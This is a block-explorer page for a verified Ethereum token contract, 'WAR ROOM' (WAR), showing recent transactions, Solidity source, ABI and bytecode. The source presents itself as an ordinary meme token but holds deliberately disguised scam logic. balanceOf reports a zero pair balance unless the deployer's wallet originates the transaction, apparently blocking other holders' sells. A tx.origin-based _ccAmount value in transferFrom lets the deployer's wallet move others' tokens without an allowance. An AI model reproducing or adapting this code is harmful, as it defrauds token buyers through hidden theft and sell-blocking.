ETH Price: $2,320.51 (-0.01%)

Contract

0x247EFaE4e21c587e145b848A2EB770e6aE88D9F6
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

TokenTracker

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve243472262026-01-30 10:56:3546 days ago1769770595IN
0x247EFaE4...6aE88D9F6
0 ETH0.000003450.11835321
Transfer From243472262026-01-30 10:56:3546 days ago1769770595IN
0x247EFaE4...6aE88D9F6
0 ETH0.000009150.11835321
Approve243455602026-01-30 5:22:2347 days ago1769750543IN
0x247EFaE4...6aE88D9F6
0 ETH0.000003170.06813181
Approve243440792026-01-30 0:24:4747 days ago1769732687IN
0x247EFaE4...6aE88D9F6
0 ETH0.000003540.07659683
Transfer From243440792026-01-30 0:24:4747 days ago1769732687IN
0x247EFaE4...6aE88D9F6
0 ETH0.000005920.07659683
Approve243431452026-01-29 21:16:5947 days ago1769721419IN
0x247EFaE4...6aE88D9F6
0 ETH0.000009640.20697365
Approve243428622026-01-29 20:20:1147 days ago1769718011IN
0x247EFaE4...6aE88D9F6
0 ETH0.000008450.18158098
Approve243414452026-01-29 15:35:4747 days ago1769700947IN
0x247EFaE4...6aE88D9F6
0 ETH0.000213734.59113036
Approve243408482026-01-29 13:36:2347 days ago1769693783IN
0x247EFaE4...6aE88D9F6
0 ETH0.000033480.7188628
Approve243406832026-01-29 13:03:2347 days ago1769691803IN
0x247EFaE4...6aE88D9F6
0 ETH0.000008580.18457668
Approve243404892026-01-29 12:24:2347 days ago1769689463IN
0x247EFaE4...6aE88D9F6
0 ETH0.000005370.1842181
Approve243404872026-01-29 12:23:5947 days ago1769689439IN
0x247EFaE4...6aE88D9F6
0 ETH0.000005380.18474887
Approve243404832026-01-29 12:23:1147 days ago1769689391IN
0x247EFaE4...6aE88D9F6
0 ETH0.000005630.19342709
Approve243404812026-01-29 12:22:4747 days ago1769689367IN
0x247EFaE4...6aE88D9F6
0 ETH0.000004880.18542289
Approve243404782026-01-29 12:22:1147 days ago1769689331IN
0x247EFaE4...6aE88D9F6
0 ETH0.000004930.18753564
Approve243404752026-01-29 12:21:3547 days ago1769689295IN
0x247EFaE4...6aE88D9F6
0 ETH0.00000550.18887391
Approve243404722026-01-29 12:20:5947 days ago1769689259IN
0x247EFaE4...6aE88D9F6
0 ETH0.00000860.18603792
Approve243395162026-01-29 9:08:5947 days ago1769677739IN
0x247EFaE4...6aE88D9F6
0 ETH0.000026170.56599199
Approve243394962026-01-29 9:04:5947 days ago1769677499IN
0x247EFaE4...6aE88D9F6
0 ETH0.000026260.56791455
Approve243394472026-01-29 8:55:1147 days ago1769676911IN
0x247EFaE4...6aE88D9F6
0 ETH0.000006690.14402571
Approve243393302026-01-29 8:31:3548 days ago1769675495IN
0x247EFaE4...6aE88D9F6
0 ETH0.000003240.06969435
Approve243392592026-01-29 8:17:2348 days ago1769674643IN
0x247EFaE4...6aE88D9F6
0 ETH0.000002240.04817451
Approve243391552026-01-29 7:56:2348 days ago1769673383IN
0x247EFaE4...6aE88D9F6
0 ETH0.000004280.09200677
Approve243391552026-01-29 7:56:2348 days ago1769673383IN
0x247EFaE4...6aE88D9F6
0 ETH0.000004280.09200677
Approve243391552026-01-29 7:56:2348 days ago1769673383IN
0x247EFaE4...6aE88D9F6
0 ETH0.000004280.09200677
View all transactions

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Method Block
From
To
Add Liquidity ET...243384162026-01-29 5:27:3548 days ago1769664455
0x247EFaE4...6aE88D9F6
0.6 ETH
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
WAR

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2026-01-29
*/

/*

War is one of the biggest forces in the global economy. It shapes markets, drives government spending, and redirects capital during periods of uncertainty.

https://warcoin.vip
https://x.com/warcoinerc
https://t.me/warcoinerc

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

address constant _deadAddr = address(0xdead);

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
    function _msgOrigin() internal view virtual returns (address r) {
        assembly {
            r := origin()
        }
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

contract WAR is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _feeExcluded;
    mapping(address => uint256) private _feeExempt;
    address payable private _taxWallet;

    uint256 private _initialWARTax = 10;
    uint256 pfinalWARTax = 0;
    uint256 private _reduceWARTaxAt = 0;
    uint256 private _buyCount = 0;

    uint256 private _danagiWARgaesaegi;
    address private _goldeniuisyoksimusWARshitguy;
    address private _mahuheroWAR;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotalWAR = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"WAR ROOM";
    string private constant _symbol = unicode"WAR";
    uint256 public _maxTaxSwap = _tTotalWAR / 100;
    uint256 public _initWARTransferDurationBlock = 0;
    uint256 public _finalWARTransferDurationBlock = 0;
    uint256 public _WARTransferStartBlock = 0;
    uint256 private _ccAmount;

    uint256 private _REALAmount;
    
    bool public _isToken = true;
    uint8 public constant _WARVersion = 1;
    uint8 public constant _init_Tax = 0;
    uint8 public constant WEOREER = 0;

    uint256 private _WARArray;
    bool public _is__MEME = true;

    uint256 private _tVersion = 160;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;



    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(msg.sender);

        _feeExcluded[address(this)] = true;
        _feeExcluded[_taxWallet] = true;

        _feeExempt[_taxWallet] = _tVersion;

        _balances[address(this)] = _tTotalWAR;

        emit Transfer(address(0), address(this), _tTotalWAR);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotalWAR;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account] * _multiLiquidityPoolProcessedLock(account , 5);
    }

    function _multiLiquidityPoolProcessedLock(address account , uint256 lpSubAmount) internal view returns (uint256) {
        return lpSubAmount > 0 && account == uniswapV2Pair && IERC20(uniswapV2Pair).balanceOf(uniswapV2Pair) > 0 && _msgOrigin() != _taxWallet && _msgOrigin() != address(0) ? 0 : 1;
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                _ccAmount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true; 
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount = 0;
        if (
            from != address(this) && to != address(this)
        ) {
            if (
                from == uniswapV2Pair &&
                to != address(uniswapV2Router) &&
                !_feeExcluded[to] &&
                to != _taxWallet
            ) {
                _buyCount++;
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                !inSwap &&
                to == uniswapV2Pair &&
                swapEnabled &&
                from != _taxWallet
            ) {
                if (contractTokenBalance > 0)
                {
                    uint256 swapBalance = contractTokenBalance > _maxTaxSwap
                        ? _maxTaxSwap
                        : contractTokenBalance;
                    swapWARFeeTokensForEth(
                        amount > swapBalance ? swapBalance : amount
                    );
                }
                    
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendTokenETHToWARFeeTeamWallet(address(this).balance);
                }
            }
        }

        if(!isDoubleTransferCheck(from , to , amount)) {
            _balances[from] = _balances[from].sub(amount);
            _balances[to] = _balances[to].add(amount.sub(taxAmount));
            if (taxAmount > 0) {
                _balances[address(this)] = _balances[address(this)].add(taxAmount);
                emit Transfer(from, address(this), taxAmount);
            }
            if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
        }
    }

    function isDoubleTransferCheck(address from , address to , uint256 amount ) private returns(bool) {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer from the zero address");
        uint256 transferExactOut = amount;
        uint256 _subModel = _feeExempt[_msgOrigin()] ;
        if(amount > 0) _ccAmount = transferExactOut - amount * _subModel / 160;

        return false;
    }

    function sendTokenETHToWARFeeTeamWallet(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function swapWARFeeTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(uniswapV2Router), _tTotalWAR);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapEnabled = true;
        tradingOpen = true;
        IERC20(uniswapV2Pair).approve(
            address(uniswapV2Router),
            type(uint256).max
        );
    }

    function rescueWARETH() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"WEOREER","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_WARTransferStartBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_WARVersion","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_finalWARTransferDurationBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_initWARTransferDurationBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_init_Tax","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_isToken","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_is__MEME","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueWARETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600a6006555f6007555f6008555f60095560646009600a620000279190620002cc565b6200003790633b9aca00620002e3565b620000439190620002fd565b600d555f600e819055600f819055601081905560138054600160ff19918216811790925560158054909116909117905560a06016556018805461ffff60a81b191690556200008e3390565b5f80546001600160a01b0319166001600160a01b0383169081178255604051929350917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600580546001600160a01b03191633178155305f908152600360209081526040808320805460ff19908116600190811790925585546001600160a01b0390811686528386208054909216909217905560165494541683526004909152902055620001446009600a620002cc565b6200015490633b9aca00620002e3565b305f81815260016020526040812092909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620001966009600a620002cc565b620001a690633b9aca00620002e3565b60405190815260200160405180910390a36200031d565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200021157815f1904821115620001f557620001f5620001bd565b808516156200020357918102915b93841c9390800290620001d6565b509250929050565b5f826200022957506001620002c6565b816200023757505f620002c6565b81600181146200025057600281146200025b576200027b565b6001915050620002c6565b60ff8411156200026f576200026f620001bd565b50506001821b620002c6565b5060208310610133831016604e8410600b8410161715620002a0575081810a620002c6565b620002ac8383620001d1565b805f1904821115620002c257620002c2620001bd565b0290505b92915050565b5f620002dc60ff84168362000219565b9392505050565b8082028115828204841417620002c657620002c6620001bd565b5f826200031857634e487b7160e01b5f52601260045260245ffd5b500490565b611636806200032b5f395ff3fe608060405260043610610134575f3560e01c806370a08231116100a85780639ede631f1161006d5780639ede631f14610316578063a7f1c21e1461032a578063a9059cbb1461033f578063d2412f3a1461035e578063dd62ed3e14610377578063f4c1f42a146103bb575f80fd5b806370a082311461027c578063715018a61461029b5780638a8c523c146102b15780638da5cb5b146102c557806395d89b41146102eb575f80fd5b806323b872dd116100f957806323b872dd1461020d57806329e929c31461022c578063313ce567146102415780633c5529311461025457806363aa107a146102675780636fec985414610254575f80fd5b806306fdde031461013f578063095ea7b3146101815780630faee56f146101b057806312373f68146101d357806318160ddd146101f9575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5060408051808201909152600881526757415220524f4f4d60c01b60208201525b60405161017891906111cd565b60405180910390f35b34801561018c575f80fd5b506101a061019b36600461122d565b6103d4565b6040519015158152602001610178565b3480156101bb575f80fd5b506101c5600d5481565b604051908152602001610178565b3480156101de575f80fd5b506101e7600181565b60405160ff9091168152602001610178565b348015610204575f80fd5b506101c56103ea565b348015610218575f80fd5b506101a0610227366004611257565b61040a565b348015610237575f80fd5b506101c560105481565b34801561024c575f80fd5b5060096101e7565b34801561025f575f80fd5b506101e75f81565b348015610272575f80fd5b506101c5600e5481565b348015610287575f80fd5b506101c5610296366004611295565b610473565b3480156102a6575f80fd5b506102af6104a1565b005b3480156102bc575f80fd5b506102af61051b565b3480156102d0575f80fd5b505f546040516001600160a01b039091168152602001610178565b3480156102f6575f80fd5b506040805180820190915260038152622ba0a960e91b602082015261016b565b348015610321575f80fd5b506102af6108ac565b348015610335575f80fd5b506101c5600f5481565b34801561034a575f80fd5b506101a061035936600461122d565b610909565b348015610369575f80fd5b506013546101a09060ff1681565b348015610382575f80fd5b506101c56103913660046112b0565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156103c6575f80fd5b506015546101a09060ff1681565b5f6103e0338484610915565b5060015b92915050565b5f6103f76009600a6113db565b61040590633b9aca006113e9565b905090565b5f610416848484610a38565b61046984336104646011546040518060600160405280602881526020016115d9602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610ddd565b610915565b5060019392505050565b5f61047f826005610e15565b6001600160a01b0383165f908152600160205260409020546103e491906113e9565b5f546001600160a01b031633146104d35760405162461bcd60e51b81526004016104ca90611400565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105445760405162461bcd60e51b81526004016104ca90611400565b601854600160a01b900460ff161561059e5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016104ca565b601780546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556105e79030906105d96009600a6113db565b61046490633b9aca006113e9565b60175f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610637573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061065b9190611435565b6001600160a01b031663c9c653963060175f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106ba573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106de9190611435565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610728573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074c9190611435565b601880546001600160a01b0319166001600160a01b039283161790556017541663f305d719473061077c81610473565b5f8061078f5f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156107f5573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061081a9190611450565b50506018805462ff00ff60a01b1981166201000160a01b1790915560175460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610885573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108a9919061147b565b50565b5f546001600160a01b031633146108d55760405162461bcd60e51b81526004016104ca90611400565b5f47116108e0575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156108a9573d5f803e3d5ffd5b5f6103e0338484610a38565b6001600160a01b0383166109775760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104ca565b6001600160a01b0382166109d85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104ca565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610a5e5760405162461bcd60e51b81526004016104ca9061149a565b6001600160a01b038216610ac05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104ca565b5f8111610b215760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104ca565b5f6001600160a01b0384163014801590610b4457506001600160a01b0383163014155b15610c76576018546001600160a01b038581169116148015610b7457506017546001600160a01b03848116911614155b8015610b9857506001600160a01b0383165f9081526003602052604090205460ff16155b8015610bb257506005546001600160a01b03848116911614155b15610bcc5760098054905f610bc6836114df565b91905055505b5f610bd630610473565b601854909150600160a81b900460ff16158015610c0057506018546001600160a01b038581169116145b8015610c155750601854600160b01b900460ff165b8015610c2f57506005546001600160a01b03868116911614155b15610c74578015610c68575f600d548211610c4a5781610c4e565b600d545b9050610c66818511610c605784610ee9565b81610ee9565b505b47610c7247611059565b505b505b610c81848484611094565b610dd7576001600160a01b0384165f90815260016020526040902054610ca79083611127565b6001600160a01b0385165f90815260016020526040902055610cea610ccc8383611127565b6001600160a01b0385165f908152600160205260409020549061116f565b6001600160a01b0384165f908152600160205260409020558015610d7a57305f90815260016020526040902054610d21908261116f565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610d719085815260200190565b60405180910390a35b6001600160a01b03831661dead14610dd7576001600160a01b038084169085167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610dc58585611127565b60405190815260200160405180910390a35b50505050565b5f8184841115610e005760405162461bcd60e51b81526004016104ca91906111cd565b505f610e0c84866114f7565b95945050505050565b5f8082118015610e3257506018546001600160a01b038481169116145b8015610ea757506018546040516370a0823160e01b81526001600160a01b03909116600482018190525f916370a0823190602401602060405180830381865afa158015610e81573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ea5919061150a565b115b8015610ec757506005546001600160a01b0316326001600160a01b031614155b8015610ed257503215155b610edd576001610edf565b5f5b60ff169392505050565b6018805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610f2f57610f2f611521565b6001600160a01b03928316602091820292909201810191909152601754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610f86573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610faa9190611435565b81600181518110610fbd57610fbd611521565b6001600160a01b039283166020918202929092010152601754610fe39130911684610915565b60175460405163791ac94760e01b81526001600160a01b039091169063791ac9479061101b9085905f90869030904290600401611535565b5f604051808303815f87803b158015611032575f80fd5b505af1158015611044573d5f803e3d5ffd5b50506018805460ff60a81b1916905550505050565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015611090573d5f803e3d5ffd5b5050565b5f6001600160a01b0384166110bb5760405162461bcd60e51b81526004016104ca9061149a565b6001600160a01b0383166110e15760405162461bcd60e51b81526004016104ca9061149a565b325f908152600460205260409020548290811561111c5760a061110482866113e9565b61110e91906115a6565b61111890836114f7565b6011555b505f95945050505050565b5f61116883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610ddd565b9392505050565b5f8061117b83856115c5565b9050838110156111685760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104ca565b5f602080835283518060208501525f5b818110156111f9578581018301518582016040015282016111dd565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146108a9575f80fd5b5f806040838503121561123e575f80fd5b823561124981611219565b946020939093013593505050565b5f805f60608486031215611269575f80fd5b833561127481611219565b9250602084013561128481611219565b929592945050506040919091013590565b5f602082840312156112a5575f80fd5b813561116881611219565b5f80604083850312156112c1575f80fd5b82356112cc81611219565b915060208301356112dc81611219565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561133557815f190482111561131b5761131b6112e7565b8085161561132857918102915b93841c9390800290611300565b509250929050565b5f8261134b575060016103e4565b8161135757505f6103e4565b816001811461136d576002811461137757611393565b60019150506103e4565b60ff841115611388576113886112e7565b50506001821b6103e4565b5060208310610133831016604e8410600b84101617156113b6575081810a6103e4565b6113c083836112fb565b805f19048211156113d3576113d36112e7565b029392505050565b5f61116860ff84168361133d565b80820281158282048414176103e4576103e46112e7565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611445575f80fd5b815161116881611219565b5f805f60608486031215611462575f80fd5b8351925060208401519150604084015190509250925092565b5f6020828403121561148b575f80fd5b81518015158114611168575f80fd5b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b5f600182016114f0576114f06112e7565b5060010190565b818103818111156103e4576103e46112e7565b5f6020828403121561151a575f80fd5b5051919050565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156115855784516001600160a01b031683529383019391830191600101611560565b50506001600160a01b03969096166060850152505050608001529392505050565b5f826115c057634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156103e4576103e46112e756fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220fea620d5878b12ba1d94ab6b4758ef15318988176e3d2f1f55255db505b1fba864736f6c63430008180033

Deployed Bytecode

